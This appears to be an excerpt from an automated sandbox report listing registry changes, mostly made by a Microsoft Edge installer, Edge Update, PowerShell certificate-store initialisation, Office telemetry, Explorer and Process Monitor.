| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\ = "ProcMon Log File" | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\System32\NOTEPAD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294935296" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME\Database\Content Type\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell\runas\command | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ = "ie_to_edge_bho.IEToEdgeBHO.1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\ = "IEToEdgeBHO Class" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\shell\open\command | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win64\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\elevation_service.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationDescription = "Browse the web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Program Files\\ProcessMonitor\\Procmon64.exe\",0" | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\ = "Microsoft Edge HTML Document" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\shell\runas\ProgrammaticAccessOnly | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\open\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --single-argument %1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\shell\runas\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --do-not-de-elevate --single-argument %1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.htm | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\DisplayName = "PDF Preview Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge\shell\open\command | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ = "Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/pdf | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
